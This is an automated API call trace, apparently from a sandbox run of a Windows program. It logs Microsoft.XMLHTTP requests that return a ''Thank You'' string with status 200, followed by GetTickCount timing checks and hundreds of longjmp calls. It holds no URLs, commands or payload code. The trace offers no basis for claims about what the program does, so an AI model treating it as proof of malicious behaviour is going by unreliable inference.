	[0171.832] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26ba48 | out: ppvObject=0x26ba48*=0x3cacc0) returned 0x0
	[0171.832] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x5a625f8 | out: ppvObject=0x5a625f8*=0x0) returned 0x80004002
	[0171.832] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0182.074] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0182.074] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf8 | out: ppvObject=0x26dbf8*=0x0) returned 0x80004002
	[0182.074] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd10*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db4c | out: rgDispId=0x26db4c*=10) returned 0x0
	[0182.074] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0182.074] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0182.074] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=10, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="'Thank You: 24237860", varVal2=0x0), pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0182.075] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0182.075] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0182.075] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0182.076] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0182.076] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0182.076] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0x0) returned 0x0
	[0182.076] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0182.077] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0182.077] malloc (_Size=0xb0) returned 0x42e060
	[0182.077] ??2@YAPEAX_K@Z () returned 0x42c950
	[0182.078] ??3@YAXPEAX@Z () returned 0x8700340001
	[0182.078] free (_Block=0x42e060) 
	[0182.078] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0182.078] ??3@YAXPEAX@Z () returned 0xb400080001
	[0182.080] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0182.080] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0182.080] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0182.080] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0182.080] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0xffffffff) returned 0x0
	[0182.080] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0182.081] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x1
	[0182.081] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x0
	[0182.081] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0182.084] GetTickCount () returned 0x1163c27
	[0182.100] GetTickCount () returned 0x1163c27
	[0182.100] longjmp () 
	[0182.100] longjmp () 
	[0182.101] longjmp () 
	[0182.101] GetCurrentThreadId () returned 0x9a8
	[0182.101] GetCurrentThreadId () returned 0x9a8
	[0182.101] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0182.101] malloc (_Size=0x80) returned 0x3c88b0
	[0182.101] longjmp () 
	[0182.101] longjmp () 
	[0182.102] longjmp () 
	[0182.102] longjmp () 
	[0182.102] longjmp () 
	[0182.102] longjmp () 
	[0182.102] longjmp () 
	[0182.103] longjmp () 
	[0182.103] longjmp () 
	[0182.103] longjmp () 
	[0182.103] longjmp () 
	[0182.104] longjmp () 
	[0182.104] longjmp () 
	[0182.104] longjmp () 
	[0182.104] longjmp () 
	[0182.104] longjmp () 
	[0182.105] longjmp () 
	[0182.105] longjmp () 
	[0182.105] longjmp () 
	[0182.105] longjmp () 
	[0182.106] longjmp () 
	[0182.106] longjmp () 
	[0182.106] longjmp () 
	[0182.106] longjmp () 
	[0182.106] longjmp () 
	[0182.107] longjmp () 
	[0182.107] longjmp () 
	[0182.107] longjmp () 
	[0182.107] longjmp () 
	[0182.108] GetTickCount () returned 0x1163c27
	[0182.108] longjmp () 
	[0182.108] longjmp () 
	[0182.108] longjmp () 
	[0182.109] longjmp () 
	[0182.109] longjmp () 
	[0182.109] longjmp () 
	[0182.109] longjmp () 
	[0182.109] longjmp () 
	[0182.110] longjmp () 
	[0182.110] longjmp () 
	[0182.110] longjmp () 
	[0182.110] longjmp () 
	[0182.111] longjmp () 
	[0182.111] longjmp () 
	[0182.111] longjmp () 
	[0182.111] longjmp () 
	[0182.111] longjmp () 
	[0182.112] longjmp () 
	[0182.112] longjmp () 
	[0182.112] longjmp () 
	[0182.112] longjmp () 
	[0182.112] longjmp () 
	[0182.113] longjmp () 
	[0182.113] longjmp () 
	[0182.113] longjmp () 
	[0182.113] longjmp () 
	[0182.113] longjmp () 
	[0182.114] longjmp () 
	[0182.114] longjmp () 
	[0182.114] longjmp () 
	[0182.114] longjmp () 
	[0182.114] longjmp () 
	[0182.115] GetTickCount () returned 0x1163c36
	[0182.115] longjmp () 
	[0182.115] longjmp () 
	[0182.115] longjmp () 
	[0182.116] longjmp () 
	[0182.116] longjmp () 
	[0182.116] longjmp () 
	[0182.116] longjmp () 
	[0182.116] longjmp () 
	[0182.117] longjmp () 
	[0182.117] longjmp () 
	[0182.117] longjmp () 
	[0182.117] longjmp () 
	[0182.118] longjmp () 
	[0182.118] longjmp () 
	[0182.118] longjmp () 
	[0182.118] longjmp () 
	[0182.119] longjmp () 
	[0182.119] longjmp () 
	[0182.119] longjmp () 
	[0182.119] longjmp () 
	[0182.119] longjmp () 
	[0182.120] longjmp () 
	[0182.120] longjmp () 
	[0182.120] longjmp () 
	[0182.120] longjmp () 
	[0182.120] longjmp () 
	[0182.121] longjmp () 
	[0182.121] longjmp () 
	[0182.121] longjmp () 
	[0182.121] longjmp () 
	[0182.122] longjmp () 
	[0182.122] longjmp () 
	[0182.122] GetTickCount () returned 0x1163c36
	[0182.122] longjmp () 
	[0182.122] longjmp () 
	[0182.123] longjmp () 
	[0182.123] longjmp () 
	[0182.123] longjmp () 
	[0182.123] longjmp () 
	[0182.124] longjmp () 
	[0182.124] longjmp () 
	[0182.124] longjmp () 
	[0182.124] longjmp () 
	[0182.124] longjmp () 
	[0182.125] longjmp () 
	[0182.125] longjmp () 
	[0182.125] longjmp () 
	[0182.125] longjmp () 
	[0182.125] longjmp () 
	[0182.126] longjmp () 
	[0182.126] longjmp () 
	[0182.126] longjmp () 
	[0182.126] longjmp () 
	[0182.127] longjmp () 
	[0182.127] longjmp () 
	[0182.127] longjmp () 
	[0182.127] longjmp () 
	[0182.127] longjmp () 
	[0182.128] longjmp () 
	[0182.128] longjmp () 
	[0182.128] longjmp () 
	[0182.128] longjmp () 
	[0182.128] longjmp () 
	[0182.129] longjmp () 
	[0182.129] longjmp () 
	[0182.129] GetTickCount () returned 0x1163c36
	[0182.129] longjmp () 
	[0182.130] longjmp () 
	[0182.130] longjmp () 
	[0182.130] longjmp () 
	[0182.130] longjmp () 
	[0182.130] longjmp () 
	[0182.131] longjmp () 
	[0182.131] longjmp () 
	[0182.131] longjmp () 
	[0182.131] longjmp () 
	[0182.132] longjmp () 
	[0182.132] longjmp () 
	[0182.132] longjmp () 
	[0182.132] longjmp () 
	[0182.132] longjmp () 
	[0182.133] longjmp () 
	[0182.133] longjmp () 
	[0182.133] longjmp () 
	[0182.133] longjmp () 
	[0182.134] longjmp () 
	[0182.134] longjmp () 
	[0182.134] longjmp () 
	[0182.134] longjmp () 
	[0182.134] longjmp () 
	[0182.135] longjmp () 
	[0182.135] longjmp () 
	[0182.135] longjmp () 
	[0182.135] longjmp () 
	[0182.136] longjmp () 
	[0182.136] longjmp () 
	[0182.136] longjmp () 
	[0182.137] longjmp () 
	[0182.137] GetTickCount () returned 0x1163c46
	[0182.137] longjmp () 
	[0182.137] longjmp () 
	[0182.137] longjmp () 
	[0182.138] longjmp () 
	[0182.138] longjmp () 
	[0182.138] longjmp () 
	[0182.138] longjmp () 
	[0182.139] longjmp () 
	[0182.139] longjmp () 
	[0182.139] longjmp () 
	[0182.139] longjmp () 
	[0182.140] longjmp () 
	[0182.140] longjmp () 
	[0182.140] longjmp () 
	[0182.140] longjmp () 
	[0182.141] longjmp () 
	[0182.141] longjmp () 
	[0182.141] longjmp () 
	[0182.141] longjmp () 
	[0182.141] longjmp () 
	[0182.142] longjmp () 
	[0182.142] longjmp () 
	[0182.142] longjmp () 
	[0182.142] longjmp () 
	[0182.143] longjmp () 
	[0182.143] longjmp () 
	[0182.143] longjmp () 
	[0182.143] longjmp () 
	[0182.144] longjmp () 
	[0182.144] longjmp () 
	[0182.144] longjmp () 
	[0182.144] longjmp () 
	[0182.145] GetTickCount () returned 0x1163c46
	[0182.145] longjmp () 
	[0182.145] longjmp () 
	[0182.145] longjmp () 
	[0182.145] longjmp () 
	[0182.146] longjmp () 
	[0182.146] longjmp () 
	[0182.146] longjmp () 
	[0182.146] longjmp () 
	[0182.147] longjmp () 
	[0182.147] longjmp () 
	[0182.147] longjmp () 
	[0182.147] longjmp () 
	[0182.148] longjmp () 
	[0182.148] longjmp () 
	[0182.148] longjmp () 
	[0182.148] longjmp () 
	[0182.148] longjmp () 
	[0182.149] longjmp () 
	[0182.149] longjmp () 
	[0182.149] longjmp () 
	[0182.149] longjmp () 
	[0182.150] longjmp () 
	[0182.150] longjmp () 
	[0182.150] longjmp () 
	[0182.150] longjmp () 
	[0182.150] longjmp () 
	[0182.151] longjmp () 
	[0182.151] longjmp () 
	[0182.151] longjmp () 
	[0182.151] longjmp () 
	[0182.152] longjmp () 
	[0182.152] longjmp () 
	[0182.152] GetTickCount () returned 0x1163c55
	[0182.152] longjmp () 
	[0182.152] longjmp () 
	[0182.153] longjmp () 
	[0182.153] longjmp () 
	[0182.153] longjmp () 
	[0182.153] longjmp () 
	[0182.153] longjmp () 
	[0182.154] longjmp () 
	[0182.154] longjmp () 
	[0182.154] longjmp () 
	[0182.154] longjmp () 
	[0182.155] longjmp () 
	[0182.155] longjmp () 
	[0182.155] longjmp () 
	[0182.155] longjmp () 
	[0182.155] longjmp () 
	[0182.156] longjmp () 
	[0182.156] longjmp () 
	[0182.156] longjmp () 
	[0182.156] longjmp () 
	[0182.157] longjmp () 
	[0182.157] longjmp () 
	[0182.157] longjmp () 
	[0182.157] longjmp () 
	[0182.158] longjmp () 
	[0182.158] longjmp () 
	[0182.158] longjmp () 
	[0182.158] longjmp () 
	[0182.159] longjmp () 
	[0182.159] longjmp () 
	[0182.159] longjmp () 
	[0182.159] longjmp () 
	[0182.159] GetTickCount () returned 0x1163c55
	[0182.160] longjmp () 
	[0182.160] longjmp () 
	[0182.160] longjmp () 
	[0182.160] longjmp () 
	[0182.160] longjmp () 
	[0182.161] longjmp () 
	[0182.161] longjmp () 
	[0182.161] longjmp () 
	[0182.161] longjmp () 
	[0182.161] longjmp () 
	[0182.161] longjmp () 
	[0182.162] longjmp () 
	[0182.163] longjmp () 
	[0182.163] longjmp () 
	[0182.163] longjmp () 
	[0182.163] longjmp () 
	[0182.164] longjmp () 
	[0182.164] longjmp () 
	[0182.164] longjmp () 
	[0182.164] longjmp () 
	[0182.164] longjmp () 
	[0182.165] longjmp () 
	[0182.165] longjmp () 
	[0182.165] longjmp () 
	[0182.165] longjmp () 
	[0182.166] longjmp () 
	[0182.166] longjmp () 
	[0182.166] longjmp () 
	[0182.166] longjmp () 
	[0182.166] longjmp () 
	[0182.167] longjmp () 
	[0182.167] longjmp () 
	[0182.167] GetTickCount () returned 0x1163c65
	[0182.167] longjmp () 
	[0182.167] longjmp () 
	[0182.167] longjmp () 
	[0182.168] longjmp () 
	[0182.168] longjmp () 
	[0182.168] longjmp () 
	[0182.168] longjmp () 
	[0182.168] longjmp () 
	[0182.169] longjmp () 
	[0182.169] longjmp () 
	[0182.169] longjmp () 
	[0182.169] longjmp () 
	[0182.170] longjmp () 
	[0182.170] longjmp () 
	[0182.170] longjmp () 
	[0182.170] longjmp () 
	[0182.170] longjmp () 
	[0182.171] longjmp () 
	[0182.171] longjmp () 
	[0182.171] longjmp () 
	[0182.171] longjmp () 
	[0182.172] longjmp () 
	[0182.172] longjmp () 
	[0182.172] longjmp () 
	[0182.172] longjmp () 
	[0182.172] longjmp () 
	[0182.173] longjmp () 
	[0182.173] longjmp () 
	[0182.173] longjmp () 
	[0182.173] longjmp () 
	[0182.174] longjmp () 
	[0182.174] longjmp () 
	[0182.174] GetTickCount () returned 0x1163c65
	[0182.174] longjmp () 
	[0182.174] longjmp () 
	[0182.175] longjmp () 
	[0182.175] longjmp () 
	[0182.175] longjmp () 
	[0182.175] longjmp () 
	[0182.175] longjmp () 
	[0182.176] longjmp () 
	[0182.176] longjmp () 
	[0182.176] longjmp () 
	[0182.176] longjmp () 
	[0182.176] longjmp () 
	[0182.177] longjmp () 
	[0182.177] longjmp () 
	[0182.177] longjmp () 
	[0182.177] longjmp () 
	[0182.178] longjmp () 
	[0182.178] longjmp () 
	[0182.178] longjmp () 
	[0182.178] longjmp () 
	[0182.178] longjmp () 
	[0182.179] longjmp () 
	[0182.179] longjmp () 
	[0182.179] longjmp () 
	[0182.179] longjmp () 
	[0182.179] longjmp () 
	[0182.180] longjmp () 
	[0182.180] longjmp () 
	[0182.180] longjmp () 
	[0182.180] longjmp () 
	[0182.180] longjmp () 
	[0182.181] longjmp () 
	[0182.181] GetTickCount () returned 0x1163c75
	[0182.181] longjmp () 
	[0182.181] longjmp () 
	[0182.181] longjmp () 
	[0182.181] longjmp () 
	[0182.182] longjmp () 
	[0182.182] longjmp () 
	[0182.182] longjmp () 
	[0182.182] longjmp () 
	[0182.183] longjmp () 
	[0182.183] longjmp () 
	[0182.183] longjmp () 
	[0182.183] longjmp () 
	[0182.183] longjmp () 
	[0182.184] longjmp () 
	[0182.184] longjmp () 
	[0182.184] longjmp () 
	[0182.184] longjmp () 
	[0182.184] longjmp () 
	[0182.184] longjmp () 
	[0182.185] longjmp () 
	[0182.185] longjmp () 
	[0182.185] longjmp () 
	[0182.185] longjmp () 
	[0182.185] longjmp () 
	[0182.186] longjmp () 
	[0182.186] longjmp () 
	[0182.186] longjmp () 
	[0182.186] longjmp () 
	[0182.187] longjmp () 
	[0182.187] longjmp () 
	[0182.187] longjmp () 
	[0182.187] longjmp () 
	[0182.188] GetTickCount () returned 0x1163c75
	[0182.188] longjmp () 
	[0182.188] longjmp () 
	[0182.188] longjmp () 
	[0182.188] longjmp () 
	[0182.188] longjmp () 
	[0182.189] longjmp () 
	[0182.189] longjmp () 
	[0182.189] longjmp () 
	[0182.189] longjmp () 
	[0182.190] longjmp () 
	[0182.190] longjmp () 
	[0182.190] longjmp () 
	[0182.190] longjmp () 
	[0182.190] longjmp () 
	[0182.190] longjmp () 
	[0182.191] longjmp () 
	[0182.191] longjmp () 
	[0182.191] longjmp () 
	[0182.191] longjmp () 
	[0182.191] longjmp () 
	[0182.192] longjmp () 
	[0182.192] longjmp () 
	[0182.192] longjmp () 
	[0182.192] longjmp () 
	[0182.193] longjmp () 
	[0182.193] longjmp () 
	[0182.194] longjmp () 
	[0182.194] longjmp () 
	[0182.194] longjmp () 
	[0182.194] longjmp () 
	[0182.195] longjmp () 
	[0182.195] longjmp () 
	[0182.195] GetTickCount () returned 0x1163c84
	[0182.195] longjmp () 
	[0182.195] longjmp () 
	[0182.195] longjmp () 
	[0182.196] longjmp () 
	[0182.196] longjmp () 
	[0182.196] longjmp () 
	[0182.196] longjmp () 
	[0182.196] longjmp () 
	[0182.197] longjmp () 
	[0182.197] longjmp () 
	[0182.197] longjmp () 
	[0182.197] longjmp () 
	[0182.198] longjmp () 
	[0182.198] longjmp () 
	[0182.198] longjmp () 
	[0182.198] longjmp () 
	[0182.200] longjmp () 
	[0182.201] longjmp () 
	[0182.201] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x26d970 | out: lpclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0182.201] SysStringLen (param_1=0x0) returned 0x0
	[0182.201] CoGetClassObject (in: rclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26d940 | out: ppv=0x26d940*=0x7fef40bac20) returned 0x0
	[0182.201] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef40bac20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26d948 | out: ppvObject=0x26d948*=0x0) returned 0x80004002
	[0182.201] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef40bac20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d930 | out: ppvObject=0x26d930*=0x47a5aa0) returned 0x0
	[0182.201] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef40bac20) returned 0x1
	[0182.201] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26d908 | out: ppvObject=0x26d908*=0x47a5b88) returned 0x0
	[0182.202] ??2@YAPEAX_K@Z () returned 0x3cacc0
	[0182.202] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x47a5b88, pUnkSite=0x3cacc0) returned 0x0
	[0182.202] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d678 | out: ppvObject=0x26d678*=0x0) returned 0x80004002
	[0182.202] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d680 | out: ppvObject=0x26d680*=0x0) returned 0x80004002
	[0182.202] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0182.202] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d860 | out: ppvObject=0x26d860*=0x3cacc0) returned 0x0
	[0182.202] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c680 | out: ppvObject=0x26c680*=0x3cacc0) returned 0x0
	[0182.202] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6b8 | out: ppvObject=0x26c6b8*=0x0) returned 0x80004002
	[0182.203] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c6a8 | out: ppvObject=0x26c6a8*=0x0) returned 0x80004002
	[0182.203] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0182.203] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0182.203] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
